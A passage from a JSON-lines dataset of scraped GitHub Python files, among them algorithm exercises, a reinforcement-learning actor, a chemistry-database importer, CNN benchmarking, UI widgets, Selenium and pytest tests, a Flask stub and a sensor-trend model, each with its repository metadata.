closed\")\r\n\r\n\r\n\r\n\r\n\r\n\"\"\" breaks out of loop if \"name == 'QUIT'\" \"\"\"\r\nnames = ['Ken', 'Amy', 'Devin', 'QUIT', 'Mark']\r\nfor name in names:\r\n if name == 'QUIT':\r\n break\r\n print(name)\r\n\r\n\r\n\"\"\" skipping an element in a for loop \"\"\"\r\nfor name in names:\r\n if name == \"QUIT\":\r\n continue\r\n print(name)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\"\"\" converting user input string into integer \"\"\"\r\nage = int(input(\"What's your age? \"))\r\n\r\n\r\n\r\n\"\"\" FUNCTIONS() \"\"\"\r\n\r\ndef hows_the_parrot():\r\n print(\"He's pining for the fjords\")\r\n\r\n\r\nhows_the_parrot()\r\n\r\n\r\n\"\"\" FUNCTION TAKING AN ARGUMENT \"\"\"\r\n\r\ndef lumberjack(name, action):\r\n if name.lower() =='god':\r\n print(\"Leave God out of this\")\r\n else:\r\n print(\"{} {} all day!\".format(name, action))\r\n\r\n\r\n\"\"\" calling a function while passing user input as the argument \"\"\"\r\n\r\nlumberjack(input(\"What is the name? \"), input(\"What do they do? \"))\r\n \r\n\r\n\"\"\" ?????????????????? \"\"\"\r\n\r\n\r\n\r\n\r\n\r\n\r\n\"\"\" EXCEPTIONS \"\"\"\r\n\r\n\"\"\" CATCHING ERROR CODES FOR USERS \"\"\"\r\n\r\ntry:\r\n count = int(input(\"Give me a number: \"))\r\nexcept ValueError:\r\n print(\"That's not a number!\")\r\nelse:\r\n print(\"nuuuuuumber....\", count, \"!\")\r\n\r\n\r\n\r\n \r\n\r\n\"\"\" PYTHON COLLECTIONS \"\"\"\r\na_list = [1, 2, 3]\r\na_list.append([4,5])\r\nprint(a_list)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n","repo_name":"DBalsimo/Python-Notes-and-Methods","sub_path":"onepytorule.py","file_name":"onepytorule.py","file_ext":"py","file_size_in_byte":3428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"25192031032","text":"import sys\r\nn,m = map(int, sys.stdin.readline().split())\r\ngraph = [[sys.maxsize for i in range(n)] for j in range(n)]\r\n\r\nfor i in range(m):\r\n a, b = map(int, sys.stdin.readline().split())\r\n graph[a-1][b-1] = 1\r\n graph[b-1][a-1] = 1\r\n\r\nfor k in range(n):\r\n for i in range(n):\r\n for j in range(n): \r\n if i == j:\r\n graph[i][j] = 0\r\n else:\r\n graph[i][j] = min(graph[i][j], graph[i][k] + graph[k][j])\r\n\r\nresult = []\r\nfor i in graph:\r\n result.append(sum(i))\r\nprint(result.index(min(result)) + 1)\r\n","repo_name":"2ndkite/baekjoon-python","sub_path":"1389 floydwarshall.py","file_name":"1389 floydwarshall.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"21138316701","text":"import tensorflow as tf\nimport numpy as np\nimport gym\n\nfrom . import constants\nfrom . import util\n\nimport time\n\nclass Actor:\n def __init__(\n self,\n threadName,\n deterministic,\n envName,\n actionOperations,\n actionScaling,\n statePh,\n memoryBuffer,\n noiseScaling,\n numActions,\n numStateVariables,\n randomStartSteps,\n gamma,\n rewardScaling,\n episodeSteps,\n maxEpisodes,\n sess\n ):\n self.threadName = threadName\n self.env = gym.make(envName)\n self.sess = sess\n self.actionOperations = actionOperations\n self.statePh = statePh\n self.memoryBuffer = memoryBuffer\n self.deterministic = deterministic\n self.actionScaling = actionScaling\n self.noiseScaling = noiseScaling\n self.numActions = numActions\n self.numStateVariables = numStateVariables\n self.randomStartSteps = randomStartSteps\n self.gamma = gamma\n self.rewardScaling = rewardScaling\n self.episodeSteps = episodeSteps\n self.maxEpisodes = maxEpisodes\n self.globalStep = 0\n self.lastGlobalStep = 0\n self.lastTime = time.time()\n self.episodeRewards = []\n self.fpsOverTime = []\n def updateFps(self):\n newTime = time.time()\n timeSpent = newTime - self.lastTime\n framesRendered = self.globalStep - self.lastGlobalStep \n fps = framesRendered / timeSpent\n self.lastGlobalStep = self.globalStep\n self.lastTime = newTime\n self.fpsOverTime.append(fps)\n return fps\n def goToNextState(self,endEarly=False):\n (\n rawAction,\n actionsChosen,\n qAssessment,\n deterministicAction,\n entropy\n ) = self.sess.run(\n self.actionOperations,\n feed_dict={\n self.statePh: [self.state]\n }\n )\n actionsChosen = actionsChosen[0] if not self.deterministic else deterministicAction[0]\n actionsChosen = actionsChosen * self.actionScaling\n if not self.deterministic:\n actionsChosen += np.random.normal(loc=0.0, scale=self.noiseScaling, size=(self.numActions,))\n if self.globalStep < self.randomStartSteps:\n actionsChosen = self.env.action_space.sample()\n nextState, reward, done, info = self.env.step(actionsChosen)\n if endEarly:\n done = True\n nextState = np.reshape(nextState, [self.numStateVariables,])\n memoryEntry = np.array(np.zeros(constants.NUM_MEMORY_ENTRIES), dtype=object)\n memoryEntry[constants.STATE] = self.state\n memoryEntry[constants.ACTION] = actionsChosen\n memoryEntry[constants.REWARD] = reward * self.rewardScaling\n memoryEntry[constants.NEXT_STATE] = nextState\n memoryEntry[constants.GAMMA] = self.gamma if not done else 0\n memoryEntry[constants.IS_TERMINAL] = done\n self.state = nextState\n self.memoryBuffer.add(memoryEntry)\n self.globalStep += 1\n self.totalEpisodeReward = self.totalEpisodeReward + reward\n return done\n def episode(self):\n state = self.env.reset()\n self.state = np.reshape(state, [self.numStateVariables,])\n self.totalEpisodeReward = 0\n done = False\n for stepNum in range(self.episodeSteps):\n done = self.goToNextState()\n if done:\n break\n if not done:\n self.goToNextState(endEarly=True)\n self.episodeRewards.append(self.totalEpisodeReward)\n fps = self.updateFps()\n print(\"REWARD: \"+str(self.totalEpisodeReward)+\" FPS: \"+str(fps))\n def execute(self):\n for episode in range(self.maxEpisodes):\n self.episode()\n time.sleep(1)","repo_name":"DanielSmithMichigan/reinforcement-learning","sub_path":"soft-actor-critic-qr-dqn-distributed/agent/Actor.py","file_name":"Actor.py","file_ext":"py","file_size_in_byte":3840,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"36496661759","text":"from __future__ import print_function\nfrom future import standard_library\nstandard_library.install_aliases()\nfrom builtins import map\nfrom builtins import str\nfrom builtins import next\nfrom builtins import object\nimport shlex\nimport socket\nimport six\nfrom sqlite3 import ProgrammingError\nif six.PY2:\n from urllib.request import urlopen as urlopen\n from urllib.error import URLError as URLError\n import http.client as http_client\nelse:\n import urllib.request as urlopen\n import urllib.error as URLError\n import http.client as http_client\n\nimport metmask.parse\nfrom metmask.parse import *\n\nsocket.setdefaulttimeout(10)\n\n\nclass parserError(Exception):\n \"\"\" raised when no suitable parser could be found or the parser had problems \"\"\"\n\n def __init__(self, value):\n self.value = value\n\n def __str__(self):\n return (repr(self.value))\n\n\nclass fileFormatError(Exception):\n \"\"\" raised when the file to parse does not look like expected\"\"\"\n\n def __init__(self, value):\n self.value = value\n\n def __str__(self):\n return (repr(self.value))\n\n\ndef fixLine(ll, sep):\n \"\"\"turn a delimited string in to a list\n with appropriate tokens\n eg '\"a\",\"2,2\"' -> ['a', '2,2'] \n\n Parameters:\n\n -`ll`, the string\n \"\"\"\n # three exceptions to make any sure empty cells are not\n # missed, i.e. turn ',,' to ', ,'\n ll = ll.strip()\n ll = re.sub('^' + sep, ' ' + sep, ll)\n ll = re.sub(sep + '$', sep + ' ', ll)\n ll = re.sub(sep + sep, sep + ' ' + sep, ll)\n ll = re.sub(sep + sep, sep + ' ' + sep, ll)\n splitter = shlex.shlex(ll, posix=True)\n splitter.whitespace = sep\n splitter.whitespace_split = True\n res = list(splitter)\n # undo any damage we did\n res = [re.sub(sep + ' ' + \\\n sep, sep + \\\n sep, x) for x in res]\n return (res)\n\n\nclass importer(object):\n \"\"\"A class for importing information to the metmask database\n \"\"\"\n\n def __init__(self, mm,\n parsertype, fileobj, source,\n confidence='good', sep1=\",\", sep2=\"|\", na=\"[nN][Aa]\",\n resolve=True, boost=False, master='unknown', token=None):\n if not re.match(\"_\", parsertype):\n parsertype = \"_\" + parsertype\n\n if not parsertype in metmask.parse.PARSERS:\n raise parserError(\"Unknown parser\")\n\n self.token = token\n \"\"\" the chemspider security token \"\"\"\n self.master = master\n \"\"\" the master table for this imported source \"\"\"\n self.tables = []\n self.sep1 = sep1\n \"\"\" primary separator (between tables) 123-23-3,c00001\"\"\"\n self.sep2 = sep2\n \"\"\" secondary separator (between indentifiers) \n 123-23-3|234-34-4\"\"\"\n self.na = na\n \"\"\" regexp to interprete as missing value \"\"\"\n self.lineNum = 0\n \"\"\" current number of read lines \"\"\"\n self.nentries = 0\n \"\"\" current number of submitted masks\"\"\"\n self.mm = mm\n \"\"\" the database \"\"\"\n self.resolve = resolve\n \"\"\" should conflicting masks be resolved\n or merged directly \"\"\"\n self.boost = boost\n \"\"\" should masks only be added if they carry \n overlap with something already in the database \"\"\"\n self.confidence = confidence\n \"\"\"string describing the confidence\"\"\"\n self.confid = mm.addConf(confidence)\n \"\"\"the confidenceid as defined by the db\"\"\"\n\n self.fileobj = fileobj\n # if we didnt get anything (just True), assume we loop over\n # all masks in the database\n if self.fileobj is True:\n self.fileobj = iter(mm.getAllMmids())\n # if we only got a string, assume it was a filename\n if 'next' not in dir(self.fileobj):\n self.fileobj = open(self.fileobj, 'r')\n \"\"\"eventually an iterator giving the input\"\"\"\n\n self.source = source\n \"\"\"string describing the source\"\"\"\n # ugly dynamic trick to get plug-in-esque parsers\n # the main action now happens with in \n # importer.<_parser>.parser.process\n st = \"self.parser = metmask.parse.\" + parsertype + \".parser(self)\"\n exec(st, locals(), globals())\n\n self.sourceid = mm.addSource(source, master=self.master)\n \"\"\"the sourceid as defined by the db\"\"\"\n\n # make sure that the necessary tables are in the db\n list(map(self.mm.createIdTable, self.tables))\n if master and master != 'unknown':\n self.mm.createIdTable(self.master)\n self.mm.connection.commit()\n\n def __del__(self):\n if 'close' in dir(self.fileobj):\n self.fileobj.close()\n try:\n self.mm.connection.commit()\n except ProgrammingError:\n pass\n\n def getLine(self, comment=None):\n \"\"\"safe way to get a new line\"\"\"\n try:\n ll = next(self.fileobj)\n self.lineNum = self.lineNum + 1\n if comment:\n while str(ll).startswith(comment):\n ll = next(self.fileobj)\n self.lineNum = self.lineNum + 1\n if not re.match('\\s', str(ll)):\n return (str(ll).strip())\n return (str(ll))\n except StopIteration:\n return ('')\n\n def setMask(self, ma, setass=True):\n \"\"\" set mask (ma) considering the settings of this parser\n Parameters:\n -`ma`: the mask to set\n -`setass`: should all associations be set to a new association code\n \"\"\"\n goAhead = True\n if self.boost:\n mmids = self.mm.getMmid(ma)\n if not mmids:\n goAhead = False\n if goAhead:\n if setass:\n ma.setAllAssoc(self.mm.addAss())\n self.nentries = self.nentries + self.mm.setMask(ma, self.resolve)\n\n def urlSafe(self, string):\n \"\"\"make string safe(r) for use as a url\n \"\"\"\n string = string.replace(\"%\", \"%25\")\n string = string.replace(\" \", \"+\")\n string = string.replace(\"/\", \"%2F\")\n string = string.replace(\"@\", \"%40\")\n string = string.replace(\"=\", \"%3D\")\n string = string.replace(\"[\", \"%5B\")\n string = string.replace(\"]\", \"%5D\")\n string = string.replace(\"+\", \"%2B\")\n string = string.replace(\":\", \"%3A\")\n string = string.replace(\";\", \"%3B\")\n string = string.replace(\",\", \"%2C\")\n string = string.replace(\"&\", \"%26\")\n string = string.replace(\"?\", \"%3F\")\n string = string.replace(\"<\", \"%3C\")\n string = string.replace(\">\", \"%3E\")\n string = string.replace(\"#\", \"%23\")\n return (string)\n\n def getUrl(self, url):\n \"\"\"get contents from url but do safely timeout if no response and\n ignore junk response\n \"\"\"\n try:\n return urlopen(url)\n except http_client.BadStatusLine as inst:\n if self.mm.debug:\n print(\"#COMMENT bad response skipping\")\n return (None)\n except URLError.URLError as inst:\n if self.mm.debug:\n print(\"#COMMENT no response skipping\")\n return (None)\n except socket.timeout as inst:\n if self.mm.debug:\n print(\"#COMMENT no response skipping\")\n return (None)\n","repo_name":"hredestig/metmask","sub_path":"metmask/parse/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7348,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"20993492445","text":"import keras\nimport numpy as np\nfrom keras.applications import vgg16, inception_v3, resnet50, mobilenet\nfrom keras.preprocessing.image import load_img\nfrom keras.preprocessing.image import img_to_array\nfrom keras.applications.imagenet_utils import decode_predictions\nimport matplotlib\nmatplotlib.use('TkAgg')\nfrom matplotlib import pyplot as plt\nimport pdb\nimport time\nimport glob\nimport os\n\ndef filedir2batch(img_dir, NMAX):\n img_pattern = os.path.join(img_dir, '*.JPEG')\n img_fnames = sorted(glob.glob(img_pattern))\n if NMAX > 0:\n img_fnames = img_fnames[:NMAX]\n\n image_batch = np.zeros((NMAX, 224, 224, 3), dtype=np.uint8)\n for i, img_fname in enumerate(img_fnames):\n original = load_img(img_fname, target_size=(224, 224))\n image_batch[i,:,:,:] = img_to_array(original)\n return image_batch\n\nclass cnn:\n def __init__(self, name):\n\n if name == \"mobilenet\":\n model_loader = mobilenet.MobileNet\n self.img_preprocessor = mobilenet.preprocess_input\n elif name == \"vgg16\":\n model_loader = vgg16.VGG16\n self.img_preprocessor = vgg16.preprocess_input\n elif name == \"inception_v3\":\n model_loader = inception_v3.InceptionV3\n self.img_preprocessor = inception_v3.preprocess_input\n elif name == \"resnet50\":\n model_loader = resnet50.ResNet50\n self.img_preprocessor = resnet50.preprocess_input\n else:\n raise Exception(\"unrecognized model name: \" + name)\n\n print(\"loading model \" + name)\n t1 = time.time()\n self.model = model_loader(weights='imagenet', include_top=False, pooling='avg')\n t2 = time.time()\n print(\"load time: \", t2 - t1)\n\n def predict(self, image_batch):\n if image_batch.ndim == 3:\n image_batch = np.expand_dims(image_batch, axis=0)\n processed_images = self.img_preprocessor(image_batch.copy())\n features = self.model.predict(processed_images)\n return features\n\nif __name__== \"__main__\":\n models = []\n models.append(cnn('vgg16'))\n models.append(cnn('inception_v3'))\n models.append(cnn('resnet50'))\n models.append(cnn('mobilenet'))\n \n filedir = 'imnet-val/imgs/'\n for i in [1, 2, 4, 8, 16, 32, 64, 128, 256, 512]:\n for j in range(3):\n t1 = time.time()\n image_batch = filedir2batch(filedir, i)\n for model in models:\n model.predict(image_batch)\n t2 = time.time()\n print(i, t2-t1, (t2-t1)/i)\n","repo_name":"davidtag/cs166-project","sub_path":"cnn.py","file_name":"cnn.py","file_ext":"py","file_size_in_byte":2348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"25402017694","text":"import time\n\nfrom manage_elements import ManageTab\nfrom helper import select, fill_form_element\n\n\nclass PolicyManager(ManageTab):\n policy_entries_css_selector = \"table#policy_table > tbody > tr\"\n policy_delete_button_id = \"button_policy_delete\"\n\n TAB_INDEX = 3\n\n def clear_policies(self):\n self.open_tab()\n\n while True:\n policies = self.driver.find_elements_by_css_selector(\n self.policy_entries_css_selector)\n if not policies:\n break\n self.delete_policy(policies[0])\n time.sleep(1)\n\n def delete_policy(self, p):\n p.click()\n self.find_by_id(self.policy_delete_button_id).click()\n self.wait_for_grid_loading()\n\n def set_new_policy(self, policy):\n \"\"\"\n Create a policy using the UI elements\n \"\"\"\n self.open_tab()\n driver = self.driver\n\n policy_active_cb = self.find_by_id(\"policy_active\")\n if not policy_active_cb.is_selected():\n policy_active_cb.click()\n\n fill_form_element(driver, \"policy_name\", policy.name)\n\n scope_select = self.find_by_id('policy_scope_combo')\n select(driver, scope_select, policy.scope)\n\n fill_form_element(driver, \"policy_action\", policy.action)\n fill_form_element(driver, \"policy_realm\", policy.realm)\n fill_form_element(driver, \"policy_name\", policy.name)\n self.find_by_id(\"button_policy_add\").click()\n self.wait_for_waiting_finished()\n\n\nclass Policy(object):\n \"\"\"Creates a LinOTP Policy\"\"\"\n\n def __init__(self, manage_ui, name, scope, action, realm):\n \"\"\"Opens the LinOTP manage interface and creates a Policy\"\"\"\n self.name = name\n self.scope = scope\n self.action = action\n self.realm = realm\n\n manage_ui.policy_view.set_new_policy(self)\n","repo_name":"alexdutton/LinOTP","sub_path":"linotpd/src/linotp/tests/integration/linotp_selenium_helper/policy.py","file_name":"policy.py","file_ext":"py","file_size_in_byte":1854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"35"} +{"seq_id":"23436270687","text":"# -*- coding: utf-8 -*-\nfrom model.group import Group\nimport random\nimport pytest\n\n\ndef test_edit_group(app, db, check_ui):\n with pytest.allure.step('Given a non-empty group list'):\n app.group.ensure_group_created(Group(name=\"test\"))\n old_groups = db.get_group_list()\n with pytest.allure.step('Given a random group from the list'):\n old_group = random.choice(old_groups)\n with pytest.allure.step('Given the new group information'):\n new_group = Group(id=old_group.id, name=\"new_name\", header=\"new_header\", footer=\"new_footer\")\n with pytest.allure.step('When I edit the group according to the new group information'):\n app.group.edit_group_by_id(old_group.id, new_group)\n with pytest.allure.step('Then the new group list is equal the old list with the updated group'):\n new_groups = db.get_group_list()\n index = -1\n for g in old_groups:\n if g.id == old_group.id:\n index = old_groups.index(g)\n break\n old_groups[index] = new_group\n assert sorted(old_groups, key=Group.id_or_max) == sorted(new_groups, key=Group.id_or_max)\n if check_ui:\n assert sorted(new_groups, key=Group.id_or_max) == sorted(app.group.get_group_list(), key=Group.id_or_max)\n","repo_name":"karagioz/python_training","sub_path":"test/test_edit_group.py","file_name":"test_edit_group.py","file_ext":"py","file_size_in_byte":1285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"3312552850","text":"import tkinter as tk\nfrom ..configure import *\n\n\nclass Label(tk.Label):\n def __init__(self, top):\n super().__init__(top)\n\n def set_text(self, text):\n self.configure(text=text)\n\n def set_color(self, color):\n self.configure(foreground=color)\n\n\nclass TitleLabel(Label):\n def __init__(self, top):\n super().__init__(top)\n self.configure(background=TL_BG,\n foreground=TL_FG,\n font=\"bold\",\n pady=7,\n anchor=\"w\")\n\n\nclass SubtitleLabel(Label):\n def __init__(self, top):\n super().__init__(top)\n self.configure(background=STL_BG,\n foreground=STL_FG,\n pady=5,\n anchor=\"w\")\n\n\nclass MessageLabel(Label):\n def __init__(self, top, text=''):\n super().__init__(top)\n self.configure(text=text,\n font=\"bold\",\n foreground=\"green\",\n pady=5,\n anchor=\"w\")\n\n\n","repo_name":"m-woj/BSPR","sub_path":"app/gui/elements/labels.py","file_name":"labels.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"35"} +{"seq_id":"35259764873","text":"import math\nfrom fractions import Fraction\n\nfrom PySide6 import QtCore, QtGui, QtWidgets\n\n\nclass Seekbar(QtWidgets.QWidget):\n seek = QtCore.Signal(float)\n step = QtCore.Signal(int)\n\n SLIDER_TIMEBASE = 1000\n SLIDER_TIMESCALE = 1.0 / SLIDER_TIMEBASE\n\n def __init__(self, config):\n super().__init__()\n\n self._slider = QtWidgets.QSlider(QtCore.Qt.Horizontal)\n self._time_lbl = QtWidgets.QLabel()\n self._time_lbl.setFont(QtGui.QFontDatabase.systemFont(QtGui.QFontDatabase.FixedFont))\n\n fw_btn = QtWidgets.QToolButton()\n fw_btn.setText(\">\")\n bw_btn = QtWidgets.QToolButton()\n bw_btn.setText(\"<\")\n\n layout = QtWidgets.QHBoxLayout(self)\n layout.setContentsMargins(0, 0, 0, 0)\n layout.addWidget(bw_btn)\n layout.addWidget(fw_btn)\n layout.addWidget(self._slider)\n layout.addWidget(self._time_lbl)\n\n self._frame_index = 0\n self._scene_duration = 0\n self._framerate = Fraction(*config.get(\"framerate\"))\n\n self._slider.sliderMoved.connect(self._slider_moved)\n self._slider.sliderPressed.connect(self._slider_pressed)\n self._slider.sliderReleased.connect(self._slider_released)\n self._slider_dragged = False\n\n fw_btn.clicked.connect(self._step_fw)\n bw_btn.clicked.connect(self._step_bw)\n\n @QtCore.Slot(int)\n def _slider_moved(self, value): # only user move\n if not self._scene_duration:\n return\n self.seek.emit(value * self.SLIDER_TIMESCALE)\n\n @QtCore.Slot()\n def _slider_pressed(self):\n self._slider_dragged = True\n\n @QtCore.Slot()\n def _slider_released(self):\n self._slider_dragged = False\n self._refresh()\n\n @QtCore.Slot()\n def _step_fw(self):\n self.step.emit(1)\n\n @QtCore.Slot()\n def _step_bw(self):\n self.step.emit(-1)\n\n def _get_time_lbl_text(self, frame_index, frame_time):\n cur_time = \"%02d:%02d\" % divmod(frame_time, 60)\n duration = \"%02d:%02d\" % divmod(self._scene_duration, 60)\n return \"%s / %s (%d @ %.4gHz)\" % (cur_time, duration, frame_index, self._framerate)\n\n def _adjust_time_label_size(self):\n # Make the time label flexible again\n self._time_lbl.setMinimumSize(0, 0)\n self._time_lbl.setMaximumSize(0xFFFFFF, 0xFFFFFF)\n\n # Set the label to its largest possible content (last frame)\n last_frame_index = int(math.ceil(self._scene_duration * self._framerate))\n text = self._get_time_lbl_text(last_frame_index, self._scene_duration)\n self._time_lbl.setText(text)\n\n # Probe the occupied size and make it fixed for the current scene\n hint = self._time_lbl.sizeHint()\n self._time_lbl.setFixedSize(hint)\n\n @QtCore.Slot(dict)\n def set_scene_metadata(self, cfg):\n self._scene_duration = cfg[\"duration\"]\n self._framerate = Fraction(*cfg[\"framerate\"])\n self._slider.setRange(0, self._scene_duration * self.SLIDER_TIMEBASE)\n self._adjust_time_label_size()\n self._refresh()\n\n @QtCore.Slot(int, float)\n def set_frame_time(self, frame_index, frame_time):\n self._frame_index = frame_index\n self._refresh()\n\n def _refresh(self):\n t = self._frame_index / self._framerate\n text = self._get_time_lbl_text(self._frame_index, t)\n self._time_lbl.setText(text)\n if not self._slider_dragged:\n self._slider.setValue(int(t * self.SLIDER_TIMEBASE))\n","repo_name":"gopro/gopro-lib-node.gl","sub_path":"pynodegl-utils/pynodegl_utils/ui/seekbar.py","file_name":"seekbar.py","file_ext":"py","file_size_in_byte":3490,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"35"} +{"seq_id":"1261855554","text":"from flask import Flask, jsonify, request, render_template\nimport urllib.request, json\n\napp = Flask(__name__)\n\napi_url = \"http://localhost:3000/db\"\n\n\nSAMPLE_DATA = []\n@app.route(\"/\", methods = ['GET'])\ndef get_articles():\n response = urllib.request.urlopen(api_url)\n data = response.read()\n result = json.loads(data)\n return render_template(\"index.html\", data=data)\n\n@app.route(\"/add\", methods = ['POST'])\ndef add_article():\n sample_data = {\n\n \"title\": \"This is the title\",\n \"body\": \"this is the body\"\n }\n return jsonify(sample_data)\n\n\nif __name__==\"__main__\":\n app.run(debug=True)","repo_name":"lagunasmel/Flask-Vue-Tutorial","sub_path":"server/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"35023806179","text":"'''\nAuthor: ASU Capstone Team 2018 - 2019\nDate: 26/03/2019\nDescription: Class for managing weekly data and derive weekly trends\n'''\nimport json\nimport traceback\nfrom datetime import datetime, timedelta\nfrom pymongo import MongoClient\nimport numpy as np\nfrom statistics import mean\n\nclass ReportEntry(object):\n \"\"\"docstring for ReportEntry\"\"\"\n def __init__(self, mac, name, timestamp, temperature, moisture, light, conductivity, battery):\n self.mac = mac\n self.name = name\n self.timestamp = timestamp\n self.temperature = temperature\n self.moisture = moisture\n self.light = light\n self.conductivity = conductivity\n self.battery = battery\n def toString(self):\n return json.dumps(self.__dict__)\n\nclass Slope(object):\n \"\"\"docstring for Slope\"\"\"\n def __init__(self, light, temperature, moisture, mac, field):\n self.light = light\n self.temperature = temperature\n self.moisture = moisture\n self.mac = mac\n self.field = field\n def toString(self):\n return json.dumps(self.__dict__) \n\nclass Averages(object):\n \"\"\"docstring for Averages\"\"\"\n def __init__(self, light, temperature, moisture, field):\n self.light = light\n self.temperature = temperature\n self.moisture = moisture\n self.field = field\n def toString(self):\n return json.dumps(self.__dict__) \n\nclass Trends(object):\n\n def __init__(self):\n self.todayDate = datetime.now()\n self.pastWeekStartDate = self.todayDate - timedelta(days=7)\n print(self.pastWeekStartDate)\n self.weekData = []\n self.client = MongoClient(\"mongodb://0.0.0.0:27017\")\n self.db = self.client.FarmInfo\n self.collection = self.db.sensorData\n self.sensorsCollection = self.db.sensors\n\n def toString(self):\n return json.dumps(self.__dict__, default=json_util.default)\n\n def getData(self):\n dataset = self.collection.find()\n for entry in dataset:\n self.weekData.append(entry)\n\n ''' Function to return a sensor's data for the entire week sorted by timestamp in ascending order'''\n def filterBySensor(self, sensorMac):\n query = {\"mac\": sensorMac, \"timestamp\": {\"$lt\": self.todayDate, \"$gte\": self.pastWeekStartDate}}\n sensorData = []\n result = self.collection.find(query).sort([('timestamp', 1)])\n for entry in result:\n entry['_id'] = str(entry['_id'])\n entry['timestamp'] = entry['timestamp'].timestamp()\n parsedEntry = ReportEntry(entry['mac'], entry['name_pretty'], entry['timestamp'], entry['temperature'], entry['moisture'], entry['light'], entry['conductivity'], entry['battery'])\n sensorData.append(entry)\n return sensorData\n '''Function to extract data for one value from the a sensor data'''\n def generateDataForOneValue(self, data, value):\n extractData = []\n for entry in data:\n extractData.append(entry[value])\n return extractData\n\n '''Function to get the three slopes for values in a field for a specific sensor in that field'''\n def getSlopesFromSensorData(self, data, mac, field):\n lightData = self.generateDataForOneValue(data, 'light')\n tempData = self.generateDataForOneValue(data, 'temperature')\n moistureData = self.generateDataForOneValue(data, 'moisture')\n timestampData = self.generateDataForOneValue(data, 'timestamp')\n\n light = self.calculateSlope(timestampData, lightData)\n temperature = self.calculateSlope(timestampData, tempData)\n moisture = self.calculateSlope(timestampData, moistureData)\n slopes = Slope(light, temperature, moisture, mac, field)\n\n '''\n UNCOMMENT BELOW TO TEST THAT DATA AND CALCULATIONS ARE RIGHT\n file = open(\"debug.txt\", \"w\")\n file.write(\"\\nFIELD:\" + field)\n file.write(\"\\n\\n\")\n file.write(\"\\n\\nLIGHT DATA\\n\")\n file.write(str(lightData))\n file.write(\"\\n\\nTEMP DATA\\n\\n\")\n file.write(str(tempData))\n file.write(\"\\n\\nMOISTURE DATA\\n\\n\")\n file.write(str(moistureData))\n file.write(\"\\n\\nTIMESTAMP DATA\\n\\n\")\n file.write(str(timestampData))\n file.write(\"\\n\\nLIGHT SLOPE:\")\n file.write(str(light))\n file.write(\"\\n\\nTEMPERATURE SLOPE:\")\n file.write(str(temperature))\n file.write(\"\\n\\nMOISTURE SLOPE:\")\n file.write(str(moisture))\n file.close()\n '''\n return slopes\n\n '''Function to generate slope from a dataset'''\n def calculateSlope(self, timeData, valueData):\n xaxis = np.array(timeData, dtype=np.float64)\n yaxis = np.array(valueData, dtype=np.float64)\n if len(yaxis) == 0 or len(xaxis) == 0:\n return 0\n slope = (((mean(xaxis) * mean(yaxis)) - mean(xaxis*yaxis)) / ((mean(xaxis)**2) - mean(xaxis**2)))\n return slope\n\n ''' Function to return averages for sensors in a field for the entire week'''\n def filterByField(self, field):\n allSensorQuery = {\"assigned_field\": field}\n fieldSlopes = []\n result = self.sensorsCollection.find(allSensorQuery)\n for entry in result:\n oneSlope = self.getSlopesFromSensorData(self.filterBySensor(entry['mac']), entry['mac'], field)\n fieldSlopes.append(oneSlope)\n return self.getFieldAverages(fieldSlopes, field)\n\n '''Function to make averages for data by sensors in a field using slopes generated for each sensor'''\n def getFieldAverages(self, slopes, field):\n lightAverage = 0\n tempAverage = 0\n moistureAverage = 0\n for slope in slopes:\n lightAverage += slope.light\n tempAverage += slope.temperature\n moistureAverage += slope.moisture\n if len(slopes) > 0:\n lightAverage = lightAverage / len(slopes)\n tempAverage = tempAverage / len(slopes)\n moistureAverage = moistureAverage / len(slopes)\n slopeAverages = Averages(lightAverage/1e-6, tempAverage/1e-6, moistureAverage/1e-6, field)\n return slopeAverages.toString()\n\n def close(self):\n self.client.close()\n\n","repo_name":"smwatki2/SolarSENSE","sub_path":"app/modules/trendsModel.py","file_name":"trendsModel.py","file_ext":"py","file_size_in_byte":6216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"5255760432","text":"# main\nimport cv2 as cv\nimport numpy as np\n\n# utilities\nfrom pathlib import Path\nfrom typing import Union, Tuple\nfrom copy import deepcopy\nimport os\n\n# TODO remove this import\nimport utils\n\n\nclass Hotkeys:\n crop = ord(\"c\")\n background = ord(\"b\")\n probably_background = ord(\"1\")\n # TODO\n # probably_background = ord(\"B\")\n foreground = ord(\"f\")\n probably_foreground = ord(\"2\")\n # TODO\n # probably_foreground = ord(\"B\")\n\n inc_brush = ord(\"=\")\n dec_brush = ord(\"-\")\n grabcut = ord(\"g\")\n mask_generator = ord(\"a\")\n\n save = ord(\"s\")\n delete = ord(\"d\")\n close = ord(\"q\")\n reset = ord(\"r\")\n\n\nclass colors:\n blue = (255, 0, 0)\n green = (0, 255, 0)\n red = (0, 0, 255)\n black = (0, 0, 0)\n # TODO\n pink = (247, 7, 203)[::-1]\n white = (255, 255, 255)\n cyan = (7, 163, 247)[::-1]\n\n\nclass Mask:\n bg = 0\n fg = 1\n probably_bg = 2\n probably_fg = 3\n\n\nclass Utils:\n pass\n\n\ndef store_cursor_pos(func):\n def decorator(self, event, x, y, flags, params):\n # store cursor position in the application\n self.app._cursor_pos = (x, y)\n # call the mouse_cb\n func(self, event, x, y, flags, params)\n\n return decorator\n\n\nclass AppState:\n def __init__(self, app: \"IGrabcut\"):\n self.name = \"NOTIMPLEMENTED\"\n\n self.app = app\n\n self._empty_cb = lambda *args, **kwargs: None\n\n def 